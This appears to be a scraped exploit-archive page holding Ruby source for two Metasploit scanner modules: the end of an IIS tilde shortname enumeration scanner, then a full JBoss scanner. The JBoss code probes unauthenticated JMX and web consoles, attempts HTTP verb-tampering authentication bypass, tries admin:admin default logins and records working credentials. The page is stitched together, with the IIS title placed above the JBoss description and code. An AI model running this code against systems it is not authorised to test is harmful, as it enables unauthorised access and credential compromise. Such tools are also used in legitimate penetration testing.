  if url.size == @name_size        @charset_duplicates.each do |x|          if get_status(url , x , "") == 404            @dirs << "#{url}*~#{x}"          end        end        # If a url exists then add to new queue for extension scan        for ext in @charset_extensions          @queue_ext << ( url + ':' + ext )          @threads << framework.threads.spawn("scanner", false) { scanner }        end      else        @charset_duplicates.each do |x|          if get_complete_status(url, x , "") == 404            @dirs << "#{url}*~#{x}"            break          end        end        if get_incomplete_status(url, "" , "1" , "") == 404          for ext in @charset_extensions            @queue_ext << ( url + ':' + ext )            @threads << framework.threads.spawn("scanner", false) { scanner }          end        elsif url.size < @name_size          for c in @charset_names            @queue  <<(url +c)          end        end      end    end  end  def reduce    # Reduce the total charset for filenames by checking if a character exists in any of the files    for c in @alpha.chars      res = send_request_cgi({        'uri' => normalize_uri(@path,"*#{c}*~1*"),        'method' => @verb      })      if res && res.code == 404        @charset_names << c      end    end  end  def ext    # Reduce the total charset for extensions by checking if a character exists in any of the extensions    for c in @alpha.chars      res = send_request_cgi({        'uri' => normalize_uri(@path,"*~1.*#{c}*"),        'method' => @verb      })      if res && res.code == 404        @charset_extensions << c      end    end  end  def dup    # Reduce the total charset for duplicate files/folders    array = [*('1'..'9')]    array.each do |c|      res = send_request_cgi({        'uri' => normalize_uri(@path,"*~#{c}.*"),        'method' => @verb      })      if res && res.code == 404        @charset_duplicates << c      end    end  end  def run    unless is_vul      print_status("Target is not vulnerable, or no shortname scannable files are present.")      return    end    unless @path.end_with? '/'      @path += '/'    end    print_status("Scanning in progress...")    @threads << framework.threads.spawn("reduce_names",false) { reduce }    @threads << framework.threads.spawn("reduce_duplicates",false) { dup }    @threads << framework.threads.spawn("reduce_extensions",false) { ext }    @threads.each(&:join)    for c in @charset_names      @queue << c    end    datastore['THREADS'].times {      @threads << framework.threads.spawn("scanner", false) { scan }    }    Rex.sleep(1) until @queue_ext.empty?    @threads.each(&:join)    proto = datastore['SSL'] ? 'https' : 'http'    if @dirs.empty?      print_status("No directories were found")    else      print_good("Found #{@dirs.size} directories")      @dirs.each do |x|        print_good("#{proto}://#{datastore['RHOST']}#{@path}#{x}")      end    end    if @files.empty?      print_status("No files were found")    else      print_good("Found #{@files.size} files")      @files.each do |x|        print_good("#{proto}://#{datastore['RHOST']}#{@path}#{x}")      end    end  endend

Microsoft IIS Shortname Scanner

This Metasploit module scans a JBoss instance for a few vulnerabilities.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(update_info(info,      'Name'                  => 'JBoss Vulnerability Scanner',      'Description'           => %q(        This module scans a JBoss instance for a few vulnerabilities.      ),      'Author'                =>        [          'Tyler Krpata',          'Zach Grace <@ztgrace>'        ],      'References'            =>        [          [ 'CVE', '2008-3273' ], # info disclosure via unauthenticated access to "/status"          [ 'CVE', '2010-1429' ], # info disclosure via unauthenticated access to "/status" (regression)          [ 'CVE', '2010-0738' ], # VERB auth bypass on "JMX-Console": /jmx-console/          [ 'CVE', '2010-1428' ], # VERB auth bypass on "Web Console": /web-console/          [ 'CVE', '2017-12149' ] # deserialization: "/invoker/readonly"        ],      'License'               => BSD_LICENSE      ))    register_options(      [        OptString.new('VERB',  [ true,  "Verb for auth bypass testing", "HEAD"])      ])  end  def run_host(ip)    res = send_request_cgi(      {        'uri'       => "/" + Rex::Text.rand_text_alpha(12),        'method'    => 'GET',        'ctype'     => 'text/plain'      })    if res      info = http_fingerprint(:response => res)      print_status("#{rhost}:#{rport} Fingerprint: #{info}")      if res.body && />(JBoss[^<]+)/.match(res.body)        print_error("#{rhost}:#{rport} JBoss error message: #{$1}")      end      apps = [        '/jmx-console/HtmlAdaptor',        '/jmx-console/checkJNDI.jsp',        '/status',        '/web-console/ServerInfo.jsp',        # apps added per Patrick Hof        '/web-console/Invoker',        '/invoker/JMXInvokerServlet',        '/invoker/readonly'      ]      print_status("#{rhost}:#{rport} Checking http...")      apps.each do |app|        check_app(app)      end      jboss_as_default_creds      ports = {        # 1098i, 1099, and 4444 needed to use twiddle        1098 => 'Naming Service',        1099 => 'Naming Service',        4444 => 'RMI invoker'      }      print_status("#{rhost}:#{rport} Checking services...")      ports.each do |port, service|        status = test_connection(ip, port) == :up ? "open" : "closed"        print_status("#{rhost}:#{rport} #{service} tcp/#{port}: #{status}")      end    end  end  def check_app(app)    res = send_request_cgi({      'uri'       => app,      'method'    => 'GET',      'ctype'     => 'text/plain'    })    unless res      print_status("#{rhost}:#{rport} #{app} not found")      return    end    case    when res.code == 200      print_good("#{rhost}:#{rport} #{app} does not require authentication (200)")    when res.code == 403      print_status("#{rhost}:#{rport} #{app} restricted (403)")    when res.code == 401      print_status("#{rhost}:#{rport} #{app} requires authentication (401): #{res.headers['WWW-Authenticate']}")      bypass_auth(app)      basic_auth_default_creds(app)    when res.code == 404      print_status("#{rhost}:#{rport} #{app} not found (404)")    when res.code == 301, res.code == 302      print_status("#{rhost}:#{rport} #{app} is redirected (#{res.code}) to #{res.headers['Location']} (not following)")    when res.code == 500 && app == "/invoker/readonly"      print_good("#{rhost}:#{rport} #{app} responded (#{res.code})")    else      print_status("#{rhost}:#{rport} Don't know how to handle response code #{res.code}")    end  end  def jboss_as_default_creds    print_status("#{rhost}:#{rport} Checking for JBoss AS default creds")    session = jboss_as_session_setup(rhost, rport)    return false if session.nil?    # Default AS creds    username = 'admin'    password = 'admin'    res = send_request_raw({      'uri'      => '/admin-console/login.seam',      'method'   => 'POST',      'version'  => '1.1',      'vhost'    => "#{rhost}",      'headers'  => { 'Content-Type'  => 'application/x-www-form-urlencoded',                      'Cookie'        => "JSESSIONID=#{session['jsessionid']}"                    },      'data'     => "login_form=login_form&login_form%3Aname=#{username}&login_form%3Apassword=#{password}&login_form%3Asubmit=Login&javax.faces.ViewState=#{session["viewstate"]}"    })    # Valid creds if 302 redirected to summary.seam and not error.seam    if res && res.code == 302 && res.headers.to_s !~ /error.seam/m && res.headers.to_s =~ /summary.seam/m      print_good("#{rhost}:#{rport} Authenticated using #{username}:#{password} at /admin-console/")      add_creds(username, password)    else      print_status("#{rhost}:#{rport} Could not guess admin credentials")    end  end  def add_creds(username, password)    service_data = {      address: rhost,      port: rport,      service_name: 'jboss',      protocol: 'tcp',      workspace_id: framework.db.workspace.id    }    credential_data = {      module_fullname: self.fullname,      origin_type: :service,      private_data: password,      private_type: :password,      username: username    }.merge(service_data)    credential_core = create_credential(credential_data)    credential_data[:core] = credential_core    create_credential_login(credential_data)  end  def jboss_as_session_setup(rhost, rport)    res = send_request_raw({      'uri'       => '/admin-console/login.seam',      'method'    => 'GET',      'version'   => '1.1',      'vhost'     => "#{rhost}"    })    unless res      return nil    end    begin      viewstate = /javax.faces.ViewState" value="(.*)" auto/.match(res.body).captures[0]      jsessionid = /JSESSIONID=(.*);/.match(res.headers.to_s).captures[0]    rescue ::NoMethodError      print_status("#{rhost}:#{rport} Could not guess admin credentials")      return nil    end    { 'jsessionid' => jsessionid, 'viewstate' => viewstate }  end  def bypass_auth(app)    print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")    res = send_request_raw({      'uri'       => app,      'method'    => datastore['VERB'],      'version'   => '1.0' # 1.1 makes the head request wait on timeout for some reason    })    if res && res.code == 200      print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering at #{app}")    else      print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")    end  end  def basic_auth_default_creds(app)    res = send_request_cgi({      'uri'       => app,      'method'    => 'GET',      'ctype'     => 'text/plain',      'authorization' => basic_auth('admin', 'admin')    })    if res && res.code == 200      print_good("#{rhost}:#{rport} Authenticated using admin:admin at #{app}")      add_creds("admin", "admin")    else      print_status("#{rhost}:#{rport} Could not guess admin credentials")    end  end  # function stole'd from mssql_ping  def test_connection(ip, port)    begin      sock = Rex::Socket::Tcp.create(        'PeerHost' => ip,        'PeerPort' => port,        'Timeout' => 20      )    rescue Rex::ConnectionError      return :down    end    sock.close    return :up  endend

Tag

#git